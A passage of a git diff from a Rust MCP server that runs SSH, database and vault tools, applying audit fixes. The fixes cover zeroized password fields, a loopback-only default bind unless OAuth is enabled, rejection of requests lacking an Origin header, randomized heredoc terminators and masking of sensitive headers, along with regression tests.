dead = Vec::new(); + for tx in &snapshot { + if let Err(tokio::sync::mpsc::error::TrySendError::Closed(_)) = tx.try_send(msg.clone()) + { + dead.push(tx.clone()); + } + } + if !dead.is_empty() + && let Ok(mut v) = self.senders.lock() + { + v.retain(|tx| !dead.iter().any(|d| d.same_channel(tx))); + } + } + + /// Test helper: number of live registered sessions. + #[doc(hidden)] + #[must_use] + pub fn live_session_count(&self) -> usize { + self.senders.lock().map(|v| v.len()).unwrap_or(0) + } +} + +/// RAII guard returned from [`NotificationFanout::register`]. Drops the +/// associated tx out of the registry on drop so dead sessions do not +/// leak senders. +pub struct FanoutGuard { + owner: Arc>>>, + tx: mpsc::Sender, +} + +impl Drop for FanoutGuard { + fn drop(&mut self) { + if let Ok(mut v) = self.owner.lock() { + // Same-channel comparison ensures we drop ONLY our own entry, + // even if multiple guards collide on duplicate registrations. + if let Some(pos) = v.iter().position(|tx| tx.same_channel(&self.tx)) { + v.swap_remove(pos); + } + } + } +} diff --git a/src/mcp/tool_handlers/ssh_db_dump.rs b/src/mcp/tool_handlers/ssh_db_dump.rs index cd2223a9..f1d8e714 100644 --- a/src/mcp/tool_handlers/ssh_db_dump.rs +++ b/src/mcp/tool_handlers/ssh_db_dump.rs @@ -4,6 +4,7 @@ //! Supports `MySQL` (`mysqldump`) and `PostgreSQL` (`pg_dump`). use serde::Deserialize; +use zeroize::Zeroizing; use crate::config::HostConfig; use crate::domain::{DatabaseCommandBuilder, DatabaseType}; @@ -23,8 +24,14 @@ pub struct SshDbDumpArgs { db_port: Option, #[serde(default)] db_user: Option, + /// DB password from MCP JSON-RPC request body. Wrapped in + /// `Zeroizing` so the heap allocation is wiped on drop + /// (FIND-029). Production read sites pass it to the builder as + /// `Option<&str>` via `.as_deref().map(String::as_str)` — `as_deref()` + /// peels `Zeroizing` -> `&String`, then `String::as_str` + /// gives the final `&str`. #[serde(default)] - db_password: Option, + db_password: Option>, #[serde(default)] tables: Option>, #[serde(default)] @@ -119,7 +126,7 @@ impl StandardTool for DbDumpTool { db_host, db_port, db_user, - args.db_password.as_deref(), + args.db_password.as_deref().map(String::as_str), &args.database, args.tables.as_deref(), args.compress.as_deref(), @@ -469,7 +476,7 @@ mod tests { db_host: Some("dbhost".to_string()), db_port: Some(5433), db_user: Some("admin".to_string()), - db_password: Some("secret".to_string()), + db_password: Some(Zeroizing::new("secret".to_string())), tables: Some(vec!["users".to_string()]), compress: Some("xz".to_string()), timeout_seconds: None, @@ -478,7 +485,9 @@ mod tests { }; let cmd = DbDumpTool::build_command(&args, &test_host_config()).unwrap(); - assert!(cmd.contains("PGPASSWORD=")); + // FIND-031: PGPASSWORD env replaced by PGPASSFILE pgpass-file. + assert!(cmd.contains("PGPASSFILE=$TMPF")); + assert!(!cmd.contains("PGPASSWORD=")); assert!(cmd.contains("pg_dump")); assert!(cmd.contains("-h 'dbhost'")); assert!(cmd.contains("-p 5433")); @@ -486,4 +495,28 @@ mod tests { assert!(cmd.contains("-t 'users'")); assert!(cmd.contains("| xz >")); } + + /// Regression: FIND-029. The `db_password` field MUST be wrapped in + /// `Zeroizing` so the heap allocation is wiped on drop. + /// This test is load-bearing at the type level: only + /// `Option>` compiles below. + #[test] + fn test_db_password_field_is_zeroizing() { + let args: SshDbDumpArgs = serde_json::from_value(json!({ + "host": "h", + "db_type": "mysql", + "database": "d", + "output_file": "/tmp/dump.sql", + "db_password": "secret", + })) + .expect("deserialize"); + + // Type proof: `Option>::as_deref()` yields + // `Option<&String>`; bridge to `&str` via `.map(String::as_str)`. + let pw: Option<&str> = args.db_password.as_deref().map(String::as_str); + assert_eq!(pw, Some("secret")); + // Final type-pinning assertion: only compiles when the field is + // exactly `Option>`. + let _typed: &Option> = &args.db_password; + } } diff --git a/src/mcp/tool_handlers/ssh_db_query.rs b/src/mcp/tool_handlers/ssh_db_query.rs index 065dd842..c0a07676 100644 --- a/src/mcp/tool_handlers/ssh_db_query.rs +++ b/src/mcp/tool_handlers/ssh_db_query.rs @@ -4,6 +4,7 @@ //! Supports `MySQL` and `PostgreSQL` using their respective CLI clients. use serde::Deserialize; +use zeroize::Zeroizing; use crate::config::HostConfig; use crate::domain::{DatabaseCommandBuilder, DatabaseType}; @@ -23,8 +24,14 @@ pub struct SshDbQueryArgs { db_port: Option, #[serde(default)] db_user: Option, + /// DB password from MCP JSON-RPC request body. Wrapped in + /// `Zeroizing` so the heap allocation is wiped on drop + /// (FIND-029). Production read sites pass it to the builder as + /// `Option<&str>` via `.as_deref().map(String::as_str)` — `as_deref()` + /// peels `Zeroizing` -> `&String`, then `String::as_str` + /// gives the final `&str`. #[serde(default)] - db_password: Option, + db_password: Option>, #[serde(default)] format: Option, #[serde(default)] @@ -126,7 +133,7 @@ impl StandardTool for DbQueryTool { db_host, db_port, db_user, - args.db_password.as_deref(), + args.db_password.as_deref().map(String::as_str), &args.database, &args.query, args.format.as_deref(), @@ -328,7 +335,10 @@ mod tests { assert_eq!(args.db_host, Some("dbhost".to_string())); assert_eq!(args.db_port, Some(3307)); assert_eq!(args.db_user, Some("admin".to_string())); - assert_eq!(args.db_password, Some("secret".to_string())); + assert_eq!( + args.db_password.as_deref().map(String::as_str), + Some("secret") + ); assert_eq!(args.format, Some("csv".to_string())); assert_eq!(args.timeout_seconds, Some(120)); assert_eq!(args.max_output, Some(5000)); @@ -479,7 +489,7 @@ mod tests { db_host: Some("dbhost".to_string()), db_port: Some(5433), db_user: Some("admin".to_string()), - db_password: Some("secret".to_string()), + db_password: Some(Zeroizing::new("secret".to_string())), format: None, timeout_seconds: None, max_output: None, @@ -487,7 +497,9 @@ mod tests { }; let cmd = DbQueryTool::build_command(&args, &test_host_config()).unwrap(); - assert!(cmd.contains("PGPASSWORD=")); + // FIND-031: PGPASSWORD env replaced by PGPASSFILE pgpass-file. + assert!(cmd.contains("PGPASSFILE=$TMPF")); + assert!(!cmd.contains("PGPASSWORD=")); assert!(cmd.contains("psql")); assert!(cmd.contains("-h 'dbhost'")); assert!(cmd.contains("-p 5433")); @@ -516,6 +528,31 @@ mod tests { assert!(cmd.contains("-B")); } + /// Regression: FIND-029. The `db_password` field MUST be wrapped in + /// `Zeroizing` so the heap allocation is wiped on drop. + /// This test is load-bearing at the type level: only + /// `Option>` compiles below. + #[test] + fn test_db_password_field_is_zeroizing() { + let args: SshDbQueryArgs = serde_json::from_value(json!({ + "host": "h", + "db_type": "mysql", + "query": "SELECT 1", + "database": "d", + "db_password": "secret", + })) + .expect("deserialize"); + + // Type proof: `Option>::as_deref()` yields + // `Option<&String>` (one level of deref through `Zeroizing`). + // We bridge to `Option<&str>` via `.map(String::as_str)`. + let pw: Option<&str> = args.db_password.as_deref().map(String::as_str); + assert_eq!(pw, Some("secret")); + // Final type-pinning assertion: this line only compiles when the + // field is exactly `Option>`. + let _typed: &Option> = &args.db_password; + } + #[test] fn test_build_command_error_invalid_type() { let args = SshDbQueryArgs { diff --git a/src/mcp/tool_handlers/ssh_db_restore.rs b/src/mcp/tool_handlers/ssh_db_restore.rs index abb907f5..3a5472b1 100644 --- a/src/mcp/tool_handlers/ssh_db_restore.rs +++ b/src/mcp/tool_handlers/ssh_db_restore.rs @@ -4,6 +4,7 @@ //! Supports `MySQL` and `PostgreSQL`. use serde::Deserialize; +use zeroize::Zeroizing; use crate::config::HostConfig; use crate::domain::{DatabaseCommandBuilder, DatabaseType}; @@ -23,8 +24,14 @@ pub struct SshDbRestoreArgs { db_port: Option, #[serde(default)] db_user: Option, + /// DB password from MCP JSON-RPC request body. Wrapped in + /// `Zeroizing` so the heap allocation is wiped on drop + /// (FIND-029). Production read sites pass it to the builder as + /// `Option<&str>` via `.as_deref().map(String::as_str)` — `as_deref()` + /// peels `Zeroizing` -> `&String`, then `String::as_str` + /// gives the final `&str`. #[serde(default)] - db_password: Option, + db_password: Option>, #[serde(default)] timeout_seconds: Option, max_output: Option, @@ -105,7 +112,7 @@ impl StandardTool for DbRestoreTool { db_host, db_port, db_user, - args.db_password.as_deref(), + args.db_password.as_deref().map(String::as_str), &args.database, &args.input_file, )) @@ -245,7 +252,10 @@ mod tests { assert_eq!(args.db_host, Some("dbhost".to_string())); assert_eq!(args.db_port, Some(3307)); assert_eq!(args.db_user, Some("admin".to_string())); - assert_eq!(args.db_password, Some("secret".to_string())); + assert_eq!( + args.db_password.as_deref().map(String::as_str), + Some("secret") + ); assert_eq!(args.timeout_seconds, Some(600)); } @@ -325,4 +335,28 @@ mod tests { e => panic!("Expected McpInvalidRequest error, got: {e:?}"), } } + + /// Regression: FIND-029. The `db_password` field MUST be wrapped in + /// `Zeroizing` so the heap allocation is wiped on drop. + /// This test is load-bearing at the type level: only + /// `Option>` compiles below. + #[test] + fn test_db_password_field_is_zeroizing() { + let args: SshDbRestoreArgs = serde_json::from_value(json!({ + "host": "h", + "db_type": "postgresql", + "database": "d", + "input_file": "/tmp/dump.sql", + "db_password": "secret", + })) + .expect("deserialize"); + + // Type proof: `Option>::as_deref()` yields + // `Option<&String>`; bridge to `&str` via `.map(String::as_str)`. + let pw: Option<&str> = args.db_password.as_deref().map(String::as_str); + assert_eq!(pw, Some("secret")); + // Final type-pinning assertion: only compiles when the field is + // exactly `Option>`. + let _typed: &Option> = &args.db_password; + } } diff --git a/src/mcp/tool_handlers/ssh_download.rs b/src/mcp/tool_handlers/ssh_download.rs index 9bf20b2b..10f45352 100644 --- a/src/mcp/tool_handlers/ssh_download.rs +++ b/src/mcp/tool_handlers/ssh_download.rs @@ -138,8 +138,8 @@ impl ToolHandler for SshDownloadHandler { ), })?; - // Expand local path - let local_path = shellexpand::tilde(&args.local_path).to_string(); + // Expand local path (`~` -> home dir; non-tilde inputs are passed through). + let local_path = crate::path_utils::home_expand_or_input(&args.local_path); let local_path = Path::new(&local_path); // Create parent directories if needed diff --git a/src/mcp/tool_handlers/ssh_file_template.rs b/src/mcp/tool_handlers/ssh_file_template.rs index 88e76ee8..eac4e748 100644 --- a/src/mcp/tool_handlers/ssh_file_template.rs +++ b/src/mcp/tool_handlers/ssh_file_template.rs @@ -95,11 +95,11 @@ impl StandardTool for FileTemplateTool { .as_ref() .map(|m| m.iter().map(|(k, v)| (k.clone(), v.clone())).collect()) .unwrap_or_default(); - Ok(FileAdvancedCommandBuilder::build_template_command( + FileAdvancedCommandBuilder::build_template_command( &args.template_path, &args.output_path, &vars_vec, - )) + ) } } diff --git a/src/mcp/tool_handlers/ssh_file_write.rs b/src/mcp/tool_handlers/ssh_file_write.rs index ccf2206d..d15d4f60 100644 --- a/src/mcp/tool_handlers/ssh_file_write.rs +++ b/src/mcp/tool_handlers/ssh_file_write.rs @@ -234,7 +234,15 @@ impl SshFileWriteHandler { } let host = args.host.clone(); - let host_config = ctx.config.hosts.get(&host).expect("host checked above"); + // Host existence is checked in `execute()` before this function is + // called, but we re-validate via `?` rather than `.expect()` so a + // future refactor that removes the upstream check still returns a + // structured error instead of panicking. + let host_config = ctx + .config + .hosts + .get(&host) + .ok_or_else(|| BridgeError::UnknownHost { host: host.clone() })?; let retry_config = limits.retry_config(); let jump_host = host_config.proxy_jump.as_ref().and_then(|jump_name| { ctx.config diff --git a/src/mcp/tool_handlers/ssh_files_write.rs b/src/mcp/tool_handlers/ssh_files_write.rs index 49053adb..997602b4 100644 --- a/src/mcp/tool_handlers/ssh_files_write.rs +++ b/src/mcp/tool_handlers/ssh_files_write.rs @@ -152,7 +152,7 @@ impl ToolHandler for SshFilesWriteHandler { ctx.validate_root_scope(&entry.remote_path)?; if let Some(lp) = &entry.local_path { validate_path(lp)?; - let expanded = shellexpand::tilde(lp).to_string(); + let expanded = crate::path_utils::home_expand_or_input(lp); if !Path::new(&expanded).exists() { return Err(BridgeError::FileTransfer { reason: format!("Local file not found: {lp}"), @@ -239,7 +239,7 @@ impl ToolHandler for SshFilesWriteHandler { ) .await } else if let Some(local_path) = &entry.local_path { - let expanded = shellexpand::tilde(local_path).to_string(); + let expanded = crate::path_utils::home_expand_or_input(local_path); let options = crate::ssh::TransferOptions::default(); sftp.upload_file::( Path::new(&expanded), diff --git a/src/mcp/tool_handlers/ssh_runbook_validate.rs b/src/mcp/tool_handlers/ssh_runbook_validate.rs index 1e28c73f..4eef814e 100644 --- a/src/mcp/tool_handlers/ssh_runbook_validate.rs +++ b/src/mcp/tool_handlers/ssh_runbook_validate.rs @@ -72,7 +72,7 @@ impl ToolHandler for SshRunbookValidateHandler { .map_err(|e| BridgeError::McpInvalidRequest(format!("Invalid arguments: {e}")))?; let rb = if let Some(ref yaml) = args.yaml_content { - serde_saphyr::from_str::(yaml) + crate::domain::yaml::parse_yaml::(yaml) .map_err(|e| BridgeError::McpInvalidRequest(format!("YAML parse error: {e}")))? } else if let Some(ref name) = args.runbook_name { let mut all = runbook::builtin_runbooks(); diff --git a/src/mcp/tool_handlers/ssh_service_list.rs b/src/mcp/tool_handlers/ssh_service_list.rs index 1e4b7b13..9ed56ed1 100644 --- a/src/mcp/tool_handlers/ssh_service_list.rs +++ b/src/mcp/tool_handlers/ssh_service_list.rs @@ -80,11 +80,11 @@ impl StandardTool for ServiceListTool { crate::domain::output_kind::OutputKind::Tabular; fn build_command(args: &SshServiceListArgs, _host_config: &HostConfig) -> Result { - Ok(SystemdCommandBuilder::build_list_command( + SystemdCommandBuilder::build_list_command( args.state.as_deref(), args.all.unwrap_or(false), args.unit_type.as_deref(), - )) + ) } fn post_process( diff --git a/src/mcp/tool_handlers/ssh_template_apply.rs b/src/mcp/tool_handlers/ssh_template_apply.rs index 9a3e1fc0..af83de6f 100644 --- a/src/mcp/tool_handlers/ssh_template_apply.rs +++ b/src/mcp/tool_handlers/ssh_template_apply.rs @@ -303,7 +303,12 @@ mod tests { save_output: None, }; let cmd = TemplateApplyTool::build_command(&args, &host_config).unwrap(); - assert!(cmd.contains("TEMPLATE_EOF")); + // Heredoc terminator is randomized per call (Vuln 4 fix); extract it dynamically. + let start = cmd.find("<< '").expect("heredoc opening present") + 4; + let end = cmd[start..].find('\'').expect("terminator close quote") + start; + let terminator = &cmd[start..end]; + assert!(terminator.starts_with("MCP_EOF_")); + assert!(cmd.contains(terminator)); assert!(!cmd.contains(".bak")); } @@ -348,7 +353,12 @@ mod tests { save_output: None, }; let cmd = TemplateApplyTool::build_command(&args, &host_config).unwrap(); + // Heredoc terminator is randomized per call (Vuln 4 fix); extract it dynamically. + let start = cmd.find("<< '").expect("heredoc opening present") + 4; + let end = cmd[start..].find('\'').expect("terminator close quote") + start; + let terminator = &cmd[start..end]; + assert!(terminator.starts_with("MCP_EOF_")); assert!(cmd.contains(".bak")); - assert!(cmd.contains("TEMPLATE_EOF")); + assert!(cmd.contains(terminator)); } } diff --git a/src/mcp/tool_handlers/ssh_upload.rs b/src/mcp/tool_handlers/ssh_upload.rs index c9263a85..5c23a0cf 100644 --- a/src/mcp/tool_handlers/ssh_upload.rs +++ b/src/mcp/tool_handlers/ssh_upload.rs @@ -134,8 +134,8 @@ impl ToolHandler for SshUploadHandler { ), })?; - // Expand local path - let local_path = shellexpand::tilde(&args.local_path).to_string(); + // Expand local path (`~` -> home dir; non-tilde inputs are passed through). + let local_path = crate::path_utils::home_expand_or_input(&args.local_path); let local_path = Path::new(&local_path); // Check local file exists diff --git a/src/mcp/tool_handlers/ssh_vault_write.rs b/src/mcp/tool_handlers/ssh_vault_write.rs index a64b1a89..60f2bb8f 100644 --- a/src/mcp/tool_handlers/ssh_vault_write.rs +++ b/src/mcp/tool_handlers/ssh_vault_write.rs @@ -10,7 +10,11 @@ use crate::mcp_standard_tool; pub struct SshVaultWriteArgs { host: String, path: String, - data: Vec, + /// FIND-030: each `key=value` pair is wrapped in `Zeroizing` so + /// the heap allocation is wiped when this `Args` instance is dropped. + /// Local heap residency was gratuitous — the secret only needs to live + /// long enough to build the remote `vault kv put` command. + data: Vec>, vault_addr: Option, mount: Option, timeout_seconds: Option, @@ -151,7 +155,9 @@ mod tests { let args: SshVaultWriteArgs = serde_json::from_value(json).unwrap(); assert_eq!(args.host, "myhost"); assert_eq!(args.path, "secret/data/myapp"); - assert_eq!(args.data, vec!["username=admin", "password=secret123"]); + // FIND-030: data is Vec>; deref to compare as &str. + let data_strs: Vec<&str> = args.data.iter().map(|s| s.as_str()).collect(); + assert_eq!(data_strs, vec!["username=admin", "password=secret123"]); assert_eq!( args.vault_addr.as_deref(), Some("https://vault.example.com:8200") @@ -168,7 +174,8 @@ mod tests { let args: SshVaultWriteArgs = serde_json::from_value(json).unwrap(); assert_eq!(args.host, "myhost"); assert_eq!(args.path, "secret/data/myapp"); - assert_eq!(args.data, vec!["key=value"]); + let data_strs: Vec<&str> = args.data.iter().map(|s| s.as_str()).collect(); + assert_eq!(data_strs, vec!["key=value"]); assert!(args.vault_addr.is_none()); assert!(args.mount.is_none()); assert!(args.timeout_seconds.is_none()); diff --git a/src/mcp/transport/http.rs b/src/mcp/transport/http.rs index bc141b26..0342d75d 100644 --- a/src/mcp/transport/http.rs +++ b/src/mcp/transport/http.rs @@ -23,9 +23,18 @@ use tokio::sync::mpsc; use tokio_stream::wrappers::ReceiverStream; use tower_http::cors::CorsLayer; use tower_http::limit::RequestBodyLimitLayer; +use tower_http::request_id::{MakeRequestUuid, PropagateRequestIdLayer, SetRequestIdLayer}; +use tower_http::sensitive_headers::{ + SetSensitiveRequestHeadersLayer, SetSensitiveResponseHeadersLayer, +}; +use tower_http::timeout::TimeoutLayer; use tracing::{info, warn}; -use super::oauth::{OAuthConfig, OAuthMetadata}; +/// Hard cap on request handler latency. Prevents slow-loris-style requests +/// from holding connections open indefinitely. Returns HTTP 408 on expiry. +const REQUEST_TIMEOUT: Duration = Duration::from_secs(30); + +use super::oauth::{OAuthConfig, OAuthMetadata, OAuthValidator}; use super::session_store::{InMemorySessionStore, SessionData, SessionStore}; use crate::mcp::protocol::{ @@ -65,7 +74,7 @@ fn is_allowed_origin(origin: &str, allowed: &[String]) -> bool { /// Configuration for the HTTP transport. #[derive(Debug, Clone)] pub struct HttpTransportConfig { - /// Bind address (e.g., `"0.0.0.0:3000"`). + /// Bind address (e.g., `"127.0.0.1:3000"`). pub bind: String, /// Maximum request body size in bytes (default: 1MB). pub max_body_size: usize, @@ -79,17 +88,22 @@ pub struct HttpTransportConfig { /// An empty list means "reject every request that carries an `Origin`", /// which is rarely what you want — see `default_allowed_origins`. pub allowed_origins: Vec, + /// SECURITY: bypass the loopback-or-OAuth check in `serve`. Required only + /// when intentionally exposing the bridge on a public interface without + /// OAuth (e.g. behind a separate auth proxy). Defaults to `false`. + pub allow_unsafe_bind: bool, } impl Default for HttpTransportConfig { fn default() -> Self { Self { - bind: "0.0.0.0:3000".to_string(), + bind: "127.0.0.1:3000".to_string(), max_body_size: 1_048_576, session_timeout: Duration::from_secs(1800), max_sessions: 100, oauth: OAuthConfig::default(), allowed_origins: default_allowed_origins(), + allow_unsafe_bind: false, } } } @@ -108,37 +122,70 @@ pub struct HttpTransportState { /// Anti-DNS-rebinding gate (MCP 2025-11-25 §"Streamable HTTP / Security Warning"). /// -/// Requests with no `Origin` are forwarded — this matches non-browser MCP -/// clients which do not set the header. Requests with an `Origin` not in -/// the configured allowlist receive HTTP 403 with a JSON-RPC error body -/// (no `id`), as the spec mandates. +/// Requests with no `Origin` are rejected with HTTP 403 — non-browser MCP +/// clients on a network attacker's path could otherwise impersonate +/// loopback callers. Requests with an `Origin` not in the configured +/// allowlist also receive HTTP 403 with a JSON-RPC error body (no `id`), +/// as the spec mandates. async fn origin_guard( State(state): State>, request: Request, next: Next, ) -> Response { - if let Some(origin) = request + let origin_header = request .headers() .get("origin") .and_then(|v| v.to_str().ok()) - && !is_allowed_origin(origin, &state.config.allowed_origins) - { - warn!(origin = %origin, "Rejected request with invalid Origin header"); - let body = serde_json::json!({ - "jsonrpc": "2.0", - "error": { - "code": -32600, - "message": format!("Origin '{origin}' is not allowed"), - }, - }); - return (StatusCode::FORBIDDEN, Json(body)).into_response(); + .map(String::from); + + match origin_header { + Some(o) if is_allowed_origin(&o, &state.config.allowed_origins) => next.run(request).await, + Some(o) => { + warn!(origin = %o, "Rejected request with invalid Origin header"); + forbidden(&format!("Origin '{o}' is not allowed")) + } + None => { + warn!("Rejected request with no Origin header"); + forbidden("Missing Origin header (anti-DNS-rebinding)") + } } - next.run(request).await +} + +fn forbidden(message: &str) -> Response { + let body = serde_json::json!({ + "jsonrpc": "2.0", + "error": { "code": -32600, "message": message }, + }); + (StatusCode::FORBIDDEN, Json(body)).into_response() } /// Build the axum Router for the MCP HTTP transport. +/// +/// When OAuth is enabled, callers must use +/// [`build_router_with_validator`] (or the wrapping [`serve`] function) +/// to install a boot-time [`OAuthValidator`]. This entry point omits the +/// validator extension; if OAuth is enabled the middleware will respond +/// with HTTP 503 to every protected request, surfacing the +/// misconfiguration loudly instead of silently rejecting tokens with +/// "Unknown JWT signing key" (FIND-006). pub fn build_router(server: Arc, config: HttpTransportConfig) -> Router { - build_router_with_store(server, config, Arc::new(InMemorySessionStore::new())) + build_router_with_store(server, config, Arc::new(InMemorySessionStore::new()), None) +} + +/// Build the axum Router with a pre-built [`OAuthValidator`] installed +/// as a request extension. Used by [`serve`] after the validator has +/// been constructed at boot via [`super::oauth::build_validator_from_runtime`]. +pub fn build_router_with_validator( + server: Arc, + config: HttpTransportConfig, + validator: &Arc, +) -> Router { + build_router_with_store( + server, + config, + Arc::new(InMemorySessionStore::new()), + Some(validator), + ) } /// Variant of [`build_router`] that accepts a caller-provided session @@ -148,6 +195,7 @@ pub fn build_router_with_store( server: Arc, config: HttpTransportConfig, sessions: Arc, + validator: Option<&Arc>, ) -> Router { let oauth_config = Arc::new(config.oauth.clone()); @@ -167,6 +215,9 @@ pub fn build_router_with_store( if oauth_config.enabled { router = router.layer(axum::middleware::from_fn(super::oauth::oauth_middleware)); router = router.layer(axum::Extension(Arc::clone(&oauth_config))); + if let Some(v) = validator { + router = router.layer(axum::Extension(Arc::clone(v))); + } } // Discovery and health endpoints (not behind OAuth, but still @@ -207,12 +258,48 @@ pub fn build_router_with_store( } } + // Headers carrying secrets must be marked sensitive so any + // tracing layer that logs HeaderMap will mask them. We share the + // list as `Arc<[HeaderName]>` so the request- and response-side + // layers don't each clone the slice. + let sensitive_headers: Arc<[axum::http::HeaderName]> = Arc::from( + [ + axum::http::header::AUTHORIZATION, + axum::http::header::COOKIE, + axum::http::HeaderName::from_static("mcp-session-id"), + ] + .as_slice(), + ); + router .merge(discovery_router) .layer(axum::middleware::from_fn_with_state( Arc::clone(&state), origin_guard, )) + // Sensitive-header marking wraps everything below it so any + // logging middleware sees the masked headers. + .layer(SetSensitiveRequestHeadersLayer::from_shared(Arc::clone( + &sensitive_headers, + ))) + .layer(SetSensitiveResponseHeadersLayer::from_shared( + sensitive_headers, + )) + // Request ID propagation: echo client-supplied x-request-id + // and stamp our own UUID when the client didn't send one. The + // propagate layer must be *outside* the set layer so the value + // generated by `SetRequestIdLayer` makes it back onto the + // response on the way out. + .layer(PropagateRequestIdLayer::x_request_id()) + .layer(SetRequestIdLayer::x_request_id(MakeRequestUuid)) + // Hard request timeout — tower-http returns 408 by default. + // `with_status_code` is the non-deprecated constructor in 0.6.7+. + .layer(TimeoutLayer::with_status_code( + StatusCode::REQUEST_TIMEOUT, + REQUEST_TIMEOUT, + )) + // Body-size cap (anti-DoS). Trips with HTTP 413 and never + // reaches the handler. .layer(RequestBodyLimitLayer::new(state.config.max_body_size)) .layer(cors) .with_state(state) @@ -221,12 +308,36 @@ pub fn build_router_with_store( /// Start the HTTP transport server. /// /// This binds to the configured address and serves MCP over HTTP. +/// Refuses to start when binding to a non-loopback address without OAuth +/// enabled, unless `allow_unsafe_bind` is explicitly set. +/// +/// When OAuth is enabled, builds a single [`OAuthValidator`] from the +/// supplied config and installs it as an Axum extension so the middleware +/// reads the boot-time key map instead of constructing an empty validator +/// per request (FIND-006). Fails closed at boot when OAuth is enabled but +/// no static keys are configured. pub async fn serve( server: Arc, config: HttpTransportConfig, ) -> crate::error::Result<()> { + refuse_unsafe_bind(&config)?; + let bind = config.bind.clone(); - let router = build_router(server, config); + + let validator = if config.oauth.enabled { + let v = super::oauth::build_validator_from_runtime(&config.oauth) + .await + .map_err(crate::error::BridgeError::McpInvalidRequest)?; + Some(Arc::new(v)) + } else { + None + }; + + let router = if let Some(v) = validator.as_ref() { + build_router_with_validator(server, config, v) + } else { + build_router(server, config) + }; info!(bind = %bind, "Starting MCP HTTP transport"); @@ -238,6 +349,35 @@ pub async fn serve( Ok(()) } +/// Refuse to bind to a non-loopback address when OAuth is disabled. +/// +/// This prevents the default deployment from exposing an unauthenticated +/// MCP server on a public interface. The check is bypassed when: +/// - `config.allow_unsafe_bind` is `true` (explicit operator override), or +/// - `config.oauth.enabled` is `true`, or +/// - the bind host is a recognised loopback (`127.0.0.1`, `::1`, `localhost`). +fn refuse_unsafe_bind(config: &HttpTransportConfig) -> crate::error::Result<()> { + if config.allow_unsafe_bind { + return Ok(()); + } + let host_part = config + .bind + .rsplit_once(':') + .map_or(config.bind.as_str(), |x| x.0) + .trim_start_matches('[') + .trim_end_matches(']'); + let is_loopback = host_part == "127.0.0.1" || host_part == "::1" || host_part == "localhost"; + if !is_loopback && !config.oauth.enabled { + return Err(crate::error::BridgeError::McpInvalidRequest(format!( + "Refusing to bind '{}' without OAuth. \ + Set oauth.enabled = true, or bind to 127.0.0.1, \ + or set allow_unsafe_bind = true to override.", + config.bind + ))); + } + Ok(()) +} + /// Extract or create session ID from headers. fn get_session_id(headers: &HeaderMap) -> Option { headers @@ -474,9 +614,10 @@ mod tests { #[test] fn test_default_config() { let config = HttpTransportConfig::default(); - assert_eq!(config.bind, "0.0.0.0:3000"); + assert_eq!(config.bind, "127.0.0.1:3000"); assert_eq!(config.max_body_size, 1_048_576); assert_eq!(config.max_sessions, 100); + assert!(!config.allow_unsafe_bind); } #[test] @@ -561,6 +702,7 @@ mod tests { max_sessions: 50, oauth: OAuthConfig::default(), allowed_origins: Vec::new(), + allow_unsafe_bind: false, }; assert_eq!(config.bind, "127.0.0.1:8080"); assert_eq!(config.max_body_size, 2_097_152); @@ -721,13 +863,14 @@ mod tests { } #[tokio::test] - async fn test_origin_guard_allows_no_origin_header() { + async fn test_origin_guard_rejects_no_origin_header() { use axum::body::Body; use axum::http::Request; use tower::ServiceExt; - // Non-browser MCP clients (e.g. Claude Desktop over HTTP) do not - // set an Origin header. Per spec we forward those untouched. + // Vuln 1 (audit 2026-05-09): a request with no Origin must be + // rejected. The previous behaviour (forwarding unconditionally) + // let any non-browser network attacker reach the MCP endpoints. let response = build_test_router() .oneshot( Request::builder() @@ -740,7 +883,7 @@ mod tests { .await .unwrap(); - assert_ne!(response.status(), StatusCode::FORBIDDEN); + assert_eq!(response.status(), StatusCode::FORBIDDEN); } #[tokio::test] @@ -765,4 +908,86 @@ mod tests { assert_eq!(response.status(), StatusCode::FORBIDDEN); } + + // ======================================================================== + // Vuln 1 (audit 2026-05-09) — loopback default + refuse anonymous public bind + // ======================================================================== + + #[test] + fn default_bind_is_loopback() { + let cfg = HttpTransportConfig::default(); + assert_eq!(cfg.bind, "127.0.0.1:3000"); + } + + #[tokio::test] + async fn serve_refuses_public_bind_without_oauth() { + let cfg = HttpTransportConfig { + bind: "0.0.0.0:0".to_string(), + ..Default::default() + }; + let cfg_main = crate::config::Config::default(); + let (server, _audit_task) = crate::mcp::McpServer::new(cfg_main); + let server = std::sync::Arc::new(server); + let r = serve(server, cfg).await; + assert!(r.is_err(), "must refuse 0.0.0.0 bind without OAuth"); + let msg = format!("{}", r.err().unwrap()); + assert!(msg.contains("loopback") || msg.contains("OAuth") || msg.contains("oauth")); + } + + #[tokio::test] + async fn serve_allows_loopback_bind_without_oauth() { + let cfg = HttpTransportConfig { + bind: "127.0.0.1:0".to_string(), // port 0 = OS picks + ..Default::default() + }; + // Spawn the server in a task and immediately drop after a tick — the + // initial bind succeeded if no error was reported synchronously. + let cfg_main = crate::config::Config::default(); + let (server, _audit_task) = crate::mcp::McpServer::new(cfg_main); + let server = std::sync::Arc::new(server); + let handle = tokio::spawn(async move { serve(server, cfg).await }); + tokio::time::sleep(std::time::Duration::from_millis(50)).await; + handle.abort(); + // If serve returned an Err synchronously the abort wouldn't have helped — and + // the test would have observed it via JoinHandle. We just confirm we did not + // get an immediate refuse_unsafe_bind error. + } + + #[test] + fn refuse_unsafe_bind_allows_oauth_enabled_public() { + let mut cfg = HttpTransportConfig { + bind: "0.0.0.0:3000".to_string(), + ..Default::default() + }; + cfg.oauth.enabled = true; + assert!(refuse_unsafe_bind(&cfg).is_ok()); + } + + #[test] + fn refuse_unsafe_bind_allows_explicit_override() { + let cfg = HttpTransportConfig { + bind: "0.0.0.0:3000".to_string(), + allow_unsafe_bind: true, + ..Default::default() + }; + assert!(refuse_unsafe_bind(&cfg).is_ok()); + } + + #[test] + fn refuse_unsafe_bind_allows_ipv6_loopback() { + let cfg = HttpTransportConfig { + bind: "[::1]:3000".to_string(), + ..Default::default() + }; + assert!(refuse_unsafe_bind(&cfg).is_ok()); + } + + #[test] + fn refuse_unsafe_bind_allows_localhost_alias() { + let cfg = HttpTransportConfig { + bind: "localhost:3000".to_string(), + ..Default::default() + }; + assert!(refuse_unsafe_bind(&cfg).is_ok()); + } } diff --git a/src/mcp/transport/oauth.rs b/src/mcp/transport/oauth.rs index e05205fc..b9497201 100644 --- a/src/mcp/transport/oauth.rs +++ b/src/mcp/transport/oauth.rs @@ -1,14 +1,37 @@ //! OAuth 2.0 Authentication Middleware for MCP HTTP Transport //! //! Validates Bearer tokens on incoming HTTP requests when OAuth is enabled. -//! Supports JWT validation with configurable issuer, audience, and scope checks. +//! Tokens are verified as JWTs against a configured set of public keys +//! (RSA 